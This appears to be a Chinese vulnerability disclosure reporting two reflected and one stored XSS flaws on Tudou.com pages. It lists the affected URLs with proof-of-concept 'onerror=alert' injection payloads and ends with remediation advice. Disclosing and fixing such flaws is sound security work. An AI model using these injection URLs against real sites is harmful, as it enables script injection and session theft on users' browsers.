土豆网某些页面由于没有进行过滤或过滤不严导致存在的两枚反射型和一枚存储型XSS跨站漏洞 存在反射型XSS的两个地址 1、 http://login.tudou.com/reg.do?act=isRegisteredNickname4Regcallback=wooyun2、 http://tjpt.my.tudou.com/tjpt/recommend?pcode=10000
存在反射型XSS的两个地址
1、
http://login.tudou.com/reg.do?act=isRegisteredNickname4Reg&callback=wooyun2、
http://tjpt.my.tudou.com/tjpt/recommend?pcode=10000100&callback=wooyun
存在存储型XSS的一个地址(这个我看已经有人发布了,但目前为止仍未修复)
3、
http://marketing.tudou.com/tianlei/shumenol2/upload.php
http://tjpt.my.tudou.com/tjpt/recommend?pcode=10000100&callback=wooyun%3CIMG%20SRC=1%20onerror=alert%28/XSS/%29%3E
http://login.tudou.com/reg.do?act=isRegisteredNickname4Reg&callback=wooyun%3CIMG%20SRC=1%20onerror=alert%28/XSS/%29%3E
http://marketing.tudou.com/tianlei/shumenol2/upload.php
没有对用户输入进行数据合法性验证,导致了持久性XSS
http://marketing.tudou.com/tianlei/shumenol2/view.php?id=1845349
//firefox弹窗效果
//chrome弹窗效果
修复方案:
1、过滤不可信数据
1、过滤不可信数据
2、对用户输入进行数据合法性验证
3、为Cookie加上HttpOnly